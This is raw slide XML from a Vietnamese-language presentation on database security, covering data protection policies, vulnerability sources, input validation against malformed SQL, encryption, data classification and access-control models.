                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tuy nhiên, để bảo vệ dữ liệu được thu thập, lưu trữ và tránh các: mối nguy vật lý, lỗi phần cứng, lỗi hoạt động, lỗi phần mềm, trộm cắp phương tiên,… Mọi công ty đều phải có chính sách bảo mật dữ liệu. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F824C0-316B-666E-9A51-67ACA35CD1C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1616801">
            <a:off x="15053855" y="2082554"/>
            <a:ext cx="2860223" cy="2793101"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F897986-A056-9F93-7437-8A32F20D084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9999"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34700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13AE-2504-DD2E-BCA7-64B398446A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E98774-BC3C-B866-F631-F022F1295D00}"/>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252C8B3E-7EA8-C366-6BB6-8DA5C54730DE}"/>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EB3D5EE4-23FD-E3A2-1910-0720F5AF7455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="742951" y="2698265"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8BBF3D-04E5-B6A3-3E14-AA47E7BC4BF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30DBEA8F-74ED-0927-D140-75867E125AE4}"/>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r>
                <a:rPr lang="vi-VN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2 Các lỗ hổng từ nhiều nguyên nhân khác nhau</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="24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3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7741500C-4F4C-D8D2-344E-87913951715B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12266762" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>H</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ầu hết các hệ thống cơ sở dữ liệu thông thường đều có rò rỉ mà kẻ tấn công có thể sử dụng để xâm nhập cơ sở dữ liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" kern="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Bef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vì </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các hoạt động độc hại</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 đối với hệ thống”</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 không nhất thiết phải từ kẻ tấn công, kỹ sư bảo mật cần thời gian để </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kiểm tra và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" kern="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xem hoạt động có thực sự nguy hiểm hay không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="25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kern="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nên chúng ta cần thường xuyên xây dựng các bản backup để tránh thiệt hại cho hệ thống và dữ liệu của người dung.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pP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Nhiều hệ thống phần mềm được thiết kế dựa trên Web và có sẵn cho </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 d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500"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ù</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 </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 qua Internet. </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Vì vậy</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họ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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 gặp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2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 loạt các cuộc tấn công dựa trên Web. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" kern="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 name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B317B3-D3E2-1F8C-014C-EF452858CE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14951441" y="2083393"/>
            <a:ext cx="2699395" cy="2760602"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349975"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D577389-B2F2-14DD-424D-D048CD66889A}"/>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1585" r="-48170"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1649847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2D81EE01-3628-108E-B7EB-A7CD34BEC10C}"/>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31683666-1CE6-80A3-054B-B739FEA0DE5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DE13FF83-1033-2D57-6FC2-2580D1123120}"/>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7E451662-70A3-D440-613B-18E8937A283A}"/>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id="{0063E101-B661-1C28-E938-C4D4FC6BDBE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="16002000" cy="5317802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="26035" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Để bảo vệ tính toàn vẹn và bảo mật dữ liệu, các kỹ thuật xác thực khác nhau đã được đề xuất. Mỗi mục dữ liệu mà người dùng gửi từ máy khách đến máy chủ đều được kiểm tra và lọc trước khi đến cơ sở dữ liệu.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ liệu đầu vào có thể được phân tích cú pháp thành các phân đoạn theo các từ khóa của cú pháp SQL và so sánh với cấu trúc dự kiến [6]. Nếu cấu trúc dự kiến khác với cấu trúc thực tế, dữ liệu đầu vào sẽ không được chuyển đến cơ sở dữ liệu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34"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q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dữ liệu trong cơ sở dữ liệu có thể được mã hóa và ngay cả trong trường hợp xâm nhập, kẻ tấn công không thể sử dụng dữ liệu đó [9]. Dữ liệu có thể được chia thành công khai, phân loại và riêng tư. Dữ liệu được phân loại có thể được truy cập bởi người dùng được ủy quyền </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng"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dirty="0">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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kế toán viên có thể xem dữ liệu bảng lương cho tất cả nhân viên) và dữ liệu riêng tư chỉ có thể được truy cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bởi người dùng đã chèn nó (mỗi người dùng có dữ liệu riêng tư).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="26035" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:effectLst/>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="26035" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="25"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2500" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3269EF9-D048-6246-16D1-8A89F4779294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2915208"/>
            <a:ext cx="9863328" cy="1400383"/>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3 Lựa chọn các kỹ thuật trong bảo mật dữ liệu đầu vào</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="25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2500" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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2232-BEA1-000B-0E1A-BCE53413F9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ABDBE1-7849-C71E-B022-C036B39BCF2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8744BFD1-C2E1-D5F0-1FAE-E74C2CCD59B6}"/>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34" name="Group 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57633644-05AE-F758-5715-8FCC2B0243B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2730270"/>
            <a:ext cx="16802100" cy="7442430"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70556116-A017-23AC-3C61-83D667F0A3F6}"/>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36" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED1BA458-8772-2DBE-E547-07AED6D4D06E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="122394" y="172424"/>
              <a:ext cx="2662920" cy="405219"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t> Cài đặt các chính sách bảo mật và xây dựng mô hình kiểm soát truy cập</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Malgun Gothic" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC0BB1E-3517-3A12-40A8-E5521D4A8767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10515600" y="3552363"/>
            <a:ext cx="6743698" cy="6400800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B4FE3E-1914-17C0-D497-BA9A4DD9AD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177710" y="3584367"/>
            <a:ext cx="9067800" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ử dụng các chính sách nhúng vào chính cơ sở dữ liệu và cho phép các chính sách này chặn mọi nỗ lực thỏa hiệp trạng thái của cơ sở dữ liệu hoặc thay đổi cấu hình của nó theo với những gì đã được chủ sở hữu hệ thống thiết lập </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ban đầu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CE1E80-53DB-2DC7-4FA4-36EB9B723619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11599607" y="9680780"/>
            <a:ext cx="4724400" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kiến trúc của cơ sở dữ liệu tự bảo vệ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
